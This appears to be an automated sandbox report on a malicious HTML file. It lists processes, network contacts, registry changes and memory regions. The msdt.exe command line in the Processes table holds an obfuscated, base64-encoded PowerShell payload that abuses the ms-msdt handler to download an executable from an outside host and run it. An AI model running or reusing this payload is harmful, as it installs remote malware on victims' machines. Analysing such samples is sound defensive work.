Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1824,i,13757677598881729272,15879241280713586661,131072
/prefetch:8
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\1024203777.test.html
|
||
C:\Windows\System32\msdt.exe
|
"C:\Windows\system32\msdt.exe" ms-msdt:/ID%20PCwdIAGnOSTic%20-skiP%20fOrce%20-PAraM%20%22It_rEbrOwsEForFILE=#7qnxE3%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=Aq$(iEX($(iEX('[SysTEm.TEXt.eNcOdinG]'+[chAr]58+[cHAr]58+'utF8.getstrING([sysTem.coNverT]'+[CHaR]0X3a+[ChAr]0X3A+'FRomBasE64sTrIng('+[cHAR]34+'c1RvUC1wck9jRXNzIC1mb3JDRSAtbmFNRSAnbXNkdCc7JEsgPSBhRGQtdFlwZSAtTUVtQmVSZGVGaU5JdGlPTiAnW0RsbEltcG9ydCgidVJsbW9OLkRMbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgZnFtLHN0cmluZyBELHN0cmluZyBFTyx1aW50IHVsLEludFB0ciB0KTsnIC1uYW1FICJ6IiAtbkFtRVNQYWNFIE0gLVBhc3NUaHJ1OyAkSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9ldmVudG9yZ2FuaXplci5way9uZXdiaXRoZXJlMjAwNTRyZmRzLmV4ZSIsIiRFTlY6QVBQREFUQVxBbnlOYW1lLmV4ZSIsMCwwKTtzdEFSdC1TbEVFcCgzKTtyVU5EbGwzMi5leEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkZU5WOkFQUERBVEFcQW55TmFtZS5leGUiO1NUT3AtUFJvQ2VzUyAtZk9yQ0UgLW5hTUUgJ3NkaWFnbmhvc3Qn'+[chAR]0x22+'))'))))Y/../../../../../../../../../../../.EXE%20%22
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1
|
172.217.168.78
|
||
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
|
216.58.215.237
|
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
accounts.google.com
|
216.58.215.237
|
||
www.google.com
|
172.217.168.36
|
||
clients.l.google.com
|
172.217.168.78
|
||
clients2.google.com
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
192.168.2.1
|
unknown
|
unknown
|
||
216.58.215.237
|
accounts.google.com
|
United States
|
||
172.217.168.78
|
clients.l.google.com
|
United States
|
||
172.217.168.36
|
www.google.com
|
United States
|
||
239.255.255.250
|
unknown
|
Reserved
|
||
192.168.2.23
|
unknown
|
unknown
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\LastWasDefault
|
S-1-5-21-3853321935-2125563209-4053062332-1002
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
ahfgeienlihckogmohjhadlkjgocpleb
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gdaefkejpgkiemlaofpalmlakkmbjdnl
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
kmendfapggjehodndflmmgagdbamhnfd
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
mhjfbmdgcfjbbpaeojofohoefgiehjai
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
neajdppkdcdipfabeoofebfddakdcjhd
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nkeimhogjdpnpccoofpliimaahmaaome
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gdaefkejpgkiemlaofpalmlakkmbjdnl
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
kmendfapggjehodndflmmgagdbamhnfd
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
neajdppkdcdipfabeoofebfddakdcjhd
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nkeimhogjdpnpccoofpliimaahmaaome
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
dr
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\StabilityMetrics
|
user_experience_metrics.stability.exited_cleanly
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
media.cdm.origin_data
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.reporting
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
media.storage_id_salt
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_account_id
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.account_id
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_startup_urls
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_homepage
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
module_blocklist_cache_md5_digest
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_seed
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
default_search_provider_data.template_url_data
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
safebrowsing.incidents_sent
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
pinned_tabs
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
browser.show_home_button
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
search_provider_overrides
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_default_search
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_version
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_username
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.startup_urls
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.restore_on_startup
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.prompt_wave
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage_is_newtabpage
|
||
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
lastrun
|
||
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
lastrun
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\LastWasDefault
|
S-1-5-21-3853321935-2125563209-4053062332-1002
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
There are 46 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
2581D270000
|
heap
|
page read and write
|
||
2581D264000
|
heap
|
page read and write
|
||
BAD06FF000
|
stack
|
page read and write
|
||
25B4933A000
|
heap
|
page read and write
|
||
2B01FEB3000
|
trusted library allocation
|
page read and write
|
||
F51EAFE000
|
stack
|
page read and write
|
||
1A4F7213000
|
heap
|
page read and write
|
||
1CB4144A000
|
heap
|
page read and write
|
||
233187C000
|
stack
|
page read and write
|
||
16744CFE000
|
heap
|
page read and write
|
||
1E398070000
|
heap
|
page read and write
|
||
2B020170000
|
remote allocation
|
page read and write
|
||
2B01BE60000
|
trusted library allocation
|
page read and write
|
||
167455C3000
|
heap
|
page read and write
|
||
EEC787E000
|
stack
|
page read and write
|
||
E5B2E7E000
|
stack
|
page read and write
|
||
2075EE40000
|
heap
|
page read and write
|
||
167455A0000
|
heap
|
page read and write
|
||
2B01A950000
|
heap
|
page read and write
|
||
16744C49000
|
heap
|
page read and write
|
||
1A4F71D0000
|
trusted library allocation
|
page read and write
|
||
24543829000
|
heap
|
page read and write
|
||
6BB45FE000
|
stack
|
page read and write
|
||
1B42EC02000
|
heap
|
page read and write
|
||
1A4F725D000
|
heap
|
page read and write
|
||
16745593000
|
heap
|
page read and write
|
||
21E60200000
|
heap
|
page read and write
|
||
26E75FB000
|
stack
|
page read and write
|
||
2075EF70000
|
heap
|
page read and write
|
||
16745588000
|
heap
|
page read and write
|
||
2B01BE63000
|
trusted library allocation
|
page read and write
|
||
2581D2B7000
|
heap
|
page read and write
|
||
9D09E7E000
|
stack
|
page read and write
|
||
2581D35B000
|
heap
|
page read and write
|
||
16744D16000
|
heap
|
page read and write
|
||
1A4F6F90000
|
heap
|
page read and write
|
||
21E60274000
|
heap
|
page read and write
|
||
2581ECE0000
|
heap
|
page read and write
|
||
653DA7C000
|
stack
|
page read and write
|
||
2454388A000
|
heap
|
page read and write
|
||
25B48C00000
|
heap
|
page read and write
|
||
2B01B39D000
|
heap
|
page read and write
|
||
2A6C8400000
|
heap
|
page read and write
|
||
1674557D000
|
heap
|
page read and write
|
||
25B49312000
|
heap
|
page read and write
|
||
16745581000
|
heap
|
page read and write
|
||
64DED78000
|
stack
|
page read and write
|
||
EEC777E000
|
stack
|
page read and write
|
||
1E39804C000
|
heap
|
page read and write
|
||
2581EBE0000
|
heap
|
page read and write
|
||
1674557F000
|
heap
|
page read and write
|
||
24543760000
|
heap
|
page read and write
|
||
1E398000000
|
heap
|
page read and write
|
||
2B020326000
|
heap
|
page read and write
|
||
78B4B9F000
|
stack
|
page read and write
|
||
CA022FE000
|
stack
|
page read and write
|
||
2B02021E000
|
heap
|
page read and write
|
||
1B42EE30000
|
heap
|
page read and write
|
||
25B48CC8000
|
heap
|
page read and write
|
||
2581D140000
|
heap
|
page read and write
|
||
21E6023D000
|
heap
|
page read and write
|
||
1CB41390000
|
heap
|
page read and write
|
||
E5B2B7F000
|
stack
|
page read and write
|
||
16745593000
|
heap
|
page read and write
|
||
2B01B358000
|
heap
|
page read and write
|
||
1E39804A000
|
heap
|
page read and write
|
||
1B42E2A0000
|
heap
|
page read and write
|
||
2B01BAE0000
|
trusted library section
|
page readonly
|
||
2581D1B0000
|
heap
|
page read and write
|
||
16745589000
|
heap
|
page read and write
|
||
21E60232000
|
heap
|
page read and write
|
||
2B01A940000
|
heap
|
page read and write
|
||
16745591000
|
heap
|
page read and write
|
||
16745581000
|
heap
|
page read and write
|
||
CA0237B000
|
stack
|
page read and write
|
||
1F779650000
|
trusted library allocation
|
page read and write
|
||
2B020160000
|
trusted library allocation
|
page read and write
|
||
B93A17E000
|
stack
|
page read and write
|
||
2B02001C000
|
trusted library allocation
|
page read and write
|
||
2B0202F6000
|
heap
|
page read and write
|
||
2B01AA13000
|
heap
|
page read and write
|
||
2B0204F0000
|
trusted library allocation
|
page read and write
|
||
78B4A9B000
|
stack
|
page read and write
|
||
2B01B200000
|
heap
|
page read and write
|
||
16744CED000
|
heap
|
page read and write
|
||
2B020308000
|
heap
|
page read and write
|
||
2B020304000
|
heap
|
page read and write
|
||
78B4E79000
|
stack
|
page read and write
|
||
1CB41413000
|
heap
|
page read and write
|
||
16744CC4000
|
heap
|
page read and write
|
||
26E71BB000
|
stack
|
page read and write
|
||
1F779660000
|
trusted library allocation
|
page read and write
|
||
16745581000
|
heap
|
page read and write
|
||
25820940000
|
heap
|
page read and write
|
||
2A6C8320000
|
heap
|
page read and write
|
||
2B01BAC0000
|
trusted library section
|
page readonly
|
||
2B01B318000
|
heap
|
page read and write
|
||
64DE47B000
|
stack
|
page read and write
|
||
1B42E48A000
|
heap
|
page read and write
|
||
16745402000
|
heap
|
page read and write
|
||
64DEC7D000
|
stack
|
page read and write
|
||
2B01B318000
|
heap
|
page read and write
|
||
B939CFD000
|
stack
|
page read and write
|
||
653D97F000
|
stack
|
page read and write
|
||
1B42ED02000
|
heap
|
page read and write
|
||
16745581000
|
heap
|
page read and write
|
||
1CB4143D000
|
heap
|
page read and write
|
||
1B42ED6F000
|
heap
|
page read and write
|
||
2B020054000
|
trusted library allocation
|
page read and write
|
||
2581F1F0000
|
heap
|
page read and write
|
||
21E60240000
|
heap
|
page read and write
|
||
21E60080000
|
heap
|
page read and write
|
||
16745575000
|
heap
|
page read and write
|
||
16745593000
|
heap
|
page read and write
|
||
16745575000
|
heap
|
page read and write
|
||
167455A3000
|
heap
|
page read and write
|
||
1F7796C0000
|
trusted library allocation
|
page read and write
|
||
2B0202FF000
|
heap
|
page read and write
|
||
1A4F7302000
|
heap
|
page read and write
|
||
2B02030B000
|
heap
|
page read and write
|
||
2B01AB13000
|
heap
|
page read and write
|
||
2075EF90000
|
heap
|
page read and write
|
||
2075F0B6000
|
heap
|
page read and write
|
||
2B0202FF000
|
heap
|
page read and write
|
||
E5B2F7B000
|
stack
|
page read and write
|
||
2B020015000
|
trusted library allocation
|
page read and write
|
||
167449E0000
|
heap
|
page read and write
|
||
2B020310000
|
heap
|
page read and write
|
||
2B020040000
|
trusted library allocation
|
page read and write
|
||
B939FFF000
|
stack
|
page read and write
|
||
16745584000
|
heap
|
page read and write
|
||
2B01B39C000
|
heap
|
page read and write
|
||
E5B327E000
|
stack
|
page read and write
|
||
2B01BB10000
|
trusted library section
|
page readonly
|
||
21E6027D000
|
heap
|
page read and write
|
||
1CB41502000
|
heap
|
page read and write
|
||
16745A20000
|
heap
|
page read and write
|
||
24543913000
|
heap
|
page read and write
|
||
2B01AAAE000
|
heap
|
page read and write
|
||
2B01FEB0000
|
trusted library allocation
|
page read and write
|
||
16745599000
|
heap
|
page read and write
|
||
2B01B202000
|
heap
|
page read and write
|
||
2B020170000
|
remote allocation
|
page read and write
|
||
1CB41436000
|
heap
|
page read and write
|
||
1B42EE00000
|
heap
|
page read and write
|
||
EEC77F9000
|
stack
|
page read and write
|
||
1E397F60000
|
heap
|
page read and write
|
||
21E60244000
|
heap
|
page read and write
|
||
2B01AA57000
|
heap
|
page read and write
|
||
2B01B358000
|
heap
|
page read and write
|
||
16744CEA000
|
heap
|
page read and write
|
||
16745596000
|
heap
|
page read and write
|
||
1A4F7300000
|
heap
|
page read and write
|
||
16744C52000
|
heap
|
page read and write
|
||
1B42EE23000
|
heap
|
page read and write
|
||
2B02024A000
|
heap
|
page read and write
|
||
2331D7F000
|
stack
|
page read and write
|
||
1674558F000
|
heap
|
page read and write
|
||
21E6026B000
|
heap
|
page read and write
|
||
167455B8000
|
heap
|
page read and write
|
||
1A4F725C000
|
heap
|
page read and write
|
||
78B4FFF000
|
stack
|
page read and write
|
||
2B01AA78000
|
heap
|
page read and write
|
||
1B42E400000
|
heap
|
page read and write
|
||
16745596000
|
heap
|
page read and write
|
||
2075F09B000
|
heap
|
page read and write
|
||
2581D30C000
|
heap
|
page read and write
|
||
16745586000
|
heap
|
page read and write
|
||
1E398108000
|
heap
|
page read and write
|
||
6BB44FF000
|
stack
|
page read and write
|
||
167455A7000
|
heap
|
page read and write
|
||
1674558F000
|
heap
|
page read and write
|
||
1B42ED94000
|
heap
|
page read and write
|
||
1E398076000
|
heap
|
page read and write
|
||
64DE57D000
|
stack
|
page read and write
|
||
167455B5000
|
heap
|
page read and write
|
||
1674557D000
|
heap
|
page read and write
|
||
16745270000
|
remote allocation
|
page read and write
|
||
16745A02000
|
heap
|
page read and write
|
||
21E60234000
|
heap
|
page read and write
|
||
2B02030E000
|
heap
|
page read and write
|
||
64DE778000
|
stack
|
page read and write
|
||
1CB41402000
|
heap
|
page read and write
|
||
1674551B000
|
heap
|
page read and write
|
||
9D09D7E000
|
stack
|
page read and write
|
||
167455A2000
|
heap
|
page read and write
|
||
2B020329000
|
heap
|
page read and write
|
||
21E6023B000
|
heap
|
page read and write
|
||
653D8FF000
|
stack
|
page read and write
|
||
E5B2C7A000
|
stack
|
page read and write
|
||
16745581000
|
heap
|
page read and write
|
||
1A4F7281000
|
heap
|
page read and write
|
||
16745594000
|
heap
|
page read and write
|
||
16745588000
|
heap
|
page read and write
|
||
2B020261000
|
heap
|
page read and write
|
||
1674558F000
|
heap
|
page read and write
|
||
1B42ED22000
|
heap
|
page read and write
|
||
167455B2000
|
heap
|
page read and write
|
||
B939A7C000
|
stack
|
page read and write
|
||
2581D279000
|
heap
|
page read and write
|
||
64DE7FE000
|
stack
|
page read and write
|
||
2B01AA73000
|
heap
|
page read and write
|
||
2A6C8429000
|
heap
|
page read and write
|
||
21E60261000
|
heap
|
page read and write
|
||
1F7793EC000
|
heap
|
page read and write
|
||
2B0202A8000
|
heap
|
page read and write
|
||
2B01AA26000
|
heap
|
page read and write
|
||
2B020017000
|
trusted library allocation
|
page read and write
|
||
2075F0BE000
|
heap
|
page read and write
|
||
2581D347000
|
heap
|
page read and write
|
||
26E77FC000
|
stack
|
page read and write
|
||
6BB3EFD000
|
stack
|
page read and write
|
||
25B489C0000
|
heap
|
page read and write
|
||
16745581000
|
heap
|
page read and write
|
||
2B01AA29000
|
heap
|
page read and write
|
||
16744C13000
|
heap
|
page read and write
|
||
1674558F000
|
heap
|
page read and write
|
||
6BB3DFE000
|
stack
|
page read and write
|
||
16745583000
|
heap
|
page read and write
|
||
1F779320000
|
heap
|
page read and write
|
||
16744D13000
|
heap
|
page read and write
|
||
26E7BFF000
|
stack
|
page read and write
|
||
233167B000
|
stack
|
page read and write
|
||
1B42E58C000
|
heap
|
page read and write
|
||
BAD037E000
|
stack
|
page read and write
|
||
1F77A210000
|
heap
|
page readonly
|
||
CA01E7C000
|
stack
|
page read and write
|
||
1CB41444000
|
heap
|
page read and write
|
||
2B0202FF000
|
heap
|
page read and write
|
||
2B01A9E0000
|
trusted library allocation
|
page read and write
|
||
2075F0BE000
|
heap
|
page read and write
|
||
E5B307E000
|
stack
|
page read and write
|
||
2B020306000
|
heap
|
page read and write
|
||
16745A19000
|
heap
|
page read and write
|
||
2B020324000
|
heap
|
page read and write
|
||
2B0202DD000
|
heap
|
page read and write
|
||
2454385A000
|
heap
|
page read and write
|
||
21E6026C000
|
heap
|
page read and write
|
||
2B02001E000
|
trusted library allocation
|
page read and write
|
||
CA0217F000
|
stack
|
page read and write
|
||
16745A00000
|
heap
|
page read and write
|
||
16745A02000
|
heap
|
page read and write
|
||
2B01FF00000
|
trusted library allocation
|
page read and write
|
||
1F7796F5000
|
heap
|
page read and write
|
||
2B01AA8B000
|
heap
|
page read and write
|
||
6BB40FE000
|
stack
|
page read and write
|
||
BAD04FF000
|
stack
|
page read and write
|
||
CA0277F000
|
stack
|
page read and write
|
||
2B020170000
|
remote allocation
|
page read and write
|
||
1E398102000
|
heap
|
page read and write
|
||
167449F0000
|
heap
|
page read and write
|
||
2B01B3DD000
|
heap
|
page read and write
|
||
2B0202FF000
|
heap
|
page read and write
|
||
6BB41FD000
|
stack
|
page read and write
|
||
2075F0A6000
|
heap
|
page read and write
|
||
E5B34FA000
|
unkown
|
page read and write
|
||
2B02030E000
|
heap
|
page read and write
|
||
21E60264000
|
heap
|
page read and write
|
||
16745525000
|
heap
|
page read and write
|
||
2A6C845C000
|
heap
|
page read and write
|
||
1674551D000
|
heap
|
page read and write
|
||
1B42E474000
|
heap
|
page read and write
|
||
1B42E429000
|
heap
|
page read and write
|
||
16744CBD000
|
heap
|
page read and write
|
||
2B01AA9C000
|
heap
|
page read and write
|
||
16745270000
|
remote allocation
|
page read and write
|
||
16745570000
|
heap
|
page read and write
|
||
21E60213000
|
heap
|
page read and write
|
||
16744CCE000
|
heap
|
page read and write
|
||
BACFF7C000
|
stack
|
page read and write
|
||
16745594000
|
heap
|
page read and write
|
||
16744C4B000
|
heap
|
page read and write
|
||
9D09939000
|
stack
|
page read and write
|
||
2B020034000
|
trusted library allocation
|
page read and write
|
||
2B01B215000
|
heap
|
page read and write
|
||
2B020310000
|
heap
|
page read and write
|
||
2B0200E0000
|
trusted library allocation
|
page read and write
|
||
26E7A7A000
|
stack
|
page read and write
|
||
24544002000
|
trusted library allocation
|
page read and write
|
||
E5B2AF7000
|
stack
|
page read and write
|
||
1F7796E0000
|
trusted library allocation
|
page read and write
|
||
16745A02000
|
heap
|
page read and write
|
||
1CB4142A000
|
heap
|
page read and write
|
||
2B01AA6E000
|
heap
|
page read and write
|
||
16744D02000
|
heap
|
page read and write
|
||
2B01B39A000
|
heap
|
page read and write
|
||
167455BA000
|
heap
|
page read and write
|
||
1E398029000
|
heap
|
page read and write
|
||
1B42E5B9000
|
heap
|
page read and write
|
||
2075F0B7000
|
heap
|
page read and write
|
||
167455A5000
|
heap
|
page read and write
|
||
2A6C8457000
|
heap
|
page read and write
|
||
25B48C13000
|
heap
|
page read and write
|
||
21E6026E000
|
heap
|
page read and write
|
||
167455A5000
|
heap
|
page read and write
|
||
2075F0BE000
|
heap
|
page read and write
|
||
16744C67000
|
heap
|
page read and write
|
||
21E60259000
|
heap
|
page read and write
|
||
16744D02000
|
heap
|
page read and write
|
||
2581D318000
|
heap
|
page read and write
|
||
2B020213000
|
heap
|
page read and write
|
||
1A4F7252000
|
heap
|
page read and write
|
||
24543770000
|
heap
|
page read and write
|
||
1F779700000
|
trusted library allocation
|
page read and write
|
||
6BB3C7B000
|
stack
|
page read and write
|
||
1F7793B0000
|
heap
|
page read and write
|
||
2A6C8310000
|
heap
|
page read and write
|
||
1B42ED54000
|
heap
|
page read and write
|
||
16745592000
|
heap
|
page read and write
|
||
2B020304000
|
heap
|
page read and write
|
||
1E398053000
|
heap
|
page read and write
|
||
21E60242000
|
heap
|
page read and write
|
||
78B5079000
|
stack
|
page read and write
|
||
2A6C83E0000
|
remote allocation
|
page read and write
|
||
21E60279000
|
heap
|
page read and write
|
||
16745A02000
|
heap
|
page read and write
|
||
2B0202FD000
|
heap
|
page read and write
|
||
2B0202AC000
|
heap
|
page read and write
|
||
16745557000
|
heap
|
page read and write
|
||
CA021FC000
|
stack
|
page read and write
|
||
2581EC54000
|
heap
|
page read and write
|
||
1F7793EA000
|
heap
|
page read and write
|
||
2B02030E000
|
heap
|
page read and write
|
||
16745578000
|
heap
|
page read and write
|
||
167455B3000
|
heap
|
page read and write
|
||
1E398802000
|
trusted library allocation
|
page read and write
|
||
2B0202EE000
|
heap
|
page read and write
|
||
2B020306000
|
heap
|
page read and write
|
||
16745589000
|
heap
|
page read and write
|
||
21E60241000
|
heap
|
page read and write
|
||
16745A52000
|
heap
|
page read and write
|
||
16744D08000
|
heap
|
page read and write
|
||
CA0267D000
|
stack
|
page read and write
|
||
1E398013000
|
heap
|
page read and write
|
||
21E6024E000
|
heap
|
page read and write
|
||
1E398050000
|
heap
|
page read and write
|
||
2A6C83E0000
|
remote allocation
|
page read and write
|
||
2B01FE90000
|
trusted library allocation
|
page read and write
|
||
1674558F000
|
heap
|
page read and write
|
||
1E39808F000
|
heap
|
page read and write
|
||
2B020010000
|
trusted library allocation
|
page read and write
|
||
1B42EE02000
|
heap
|
page read and write
|
||
2B01B501000
|
trusted library allocation
|
page read and write
|
||
2B020306000
|
heap
|
page read and write
|
||
1674557D000
|
heap
|
page read and write
|
||
1A4F7260000
|
heap
|
page read and write
|
||
2B01A9B0000
|
heap
|
page read and write
|
||
2B020010000
|
trusted library allocation
|
page read and write
|
||
2B01B318000
|
heap
|
page read and write
|
||
CA01C7B000
|
stack
|
page read and write
|
||
16744CD5000
|
heap
|
page read and write
|
||
2581D260000
|
heap
|
page read and write
|
||
E5B317F000
|
stack
|
page read and write
|
||
1E398082000
|
heap
|
page read and write
|
||
2B01B39D000
|
heap
|
page read and write
|
||
2331C7D000
|
stack
|
page read and write
|
||
1B42E458000
|
heap
|
page read and write
|
||
25B48CCA000
|
heap
|
page read and write
|
||
F51EBFE000
|
stack
|
page read and write
|
||
1F7792B0000
|
heap
|
page read and write
|
||
2B020050000
|
trusted library allocation
|
page read and write
|
||
1A4F7200000
|
heap
|
page read and write
|
||
2B01B318000
|
heap
|
page read and write
|
||
2B020180000
|
trusted library allocation
|
page read and write
|
||
16745594000
|
heap
|
page read and write
|
||
16745588000
|
heap
|
page read and write
|
||
16744C29000
|
heap
|
page read and write
|
||
1A4F6FA0000
|
heap
|
page read and write
|
||
EEC73AA000
|
stack
|
page read and write
|
||
6BB43FE000
|
stack
|
page read and write
|
||
16745588000
|
heap
|
page read and write
|
||
2B0202DA000
|
heap
|
page read and write
|
||
2581D26E000
|
heap
|
page read and write
|
||
25B49300000
|
heap
|
page read and write
|
||
16745581000
|
heap
|
page read and write
|
||
16744C4D000
|
heap
|
page read and write
|
||
2B020170000
|
trusted library allocation
|
page read and write
|
||
2B01BE70000
|
trusted library allocation
|
page read and write
|
||
2B020308000
|
heap
|
page read and write
|
||
1B42EDC1000
|
heap
|
page read and write
|
||
6BB46FF000
|
stack
|
page read and write
|
||
1E398056000
|
heap
|
page read and write
|
||
2A6C83E0000
|
remote allocation
|
page read and write
|
||
2B020150000
|
trusted library allocation
|
page read and write
|
||
2B020306000
|
heap
|
page read and write
|
||
F51E8FF000
|
stack
|
page read and write
|
||
16744C8D000
|
heap
|
page read and write
|
||
21E60226000
|
heap
|
page read and write
|
||
2B01B300000
|
heap
|
page read and write
|
||
1674557D000
|
heap
|
page read and write
|
||
1B42E46E000
|
heap
|
page read and write
|
||
2B02001A000
|
trusted library allocation
|
page read and write
|
||
16744CE6000
|
heap
|
page read and write
|
||
21E60070000
|
heap
|
page read and write
|
||
2581D319000
|
heap
|
page read and write
|
||
25820941000
|
heap
|
page read and write
|
||
2B020010000
|
trusted library allocation
|
page read and write
|
||
16745594000
|
heap
|
page read and write
|
||
23316FE000
|
stack
|
page read and write
|
||
167455BA000
|
heap
|
page read and write
|
||
1E397EF0000
|
heap
|
page read and write
|
||
2454383D000
|
heap
|
page read and write
|
||
1B42EE13000
|
heap
|
page read and write
|
||
2581EC50000
|
heap
|
page read and write
|
||
1B42E43C000
|
heap
|
page read and write
|
||
16745588000
|
heap
|
page read and write
|
||
245437D0000
|
heap
|
page read and write
|
||
CA0247A000
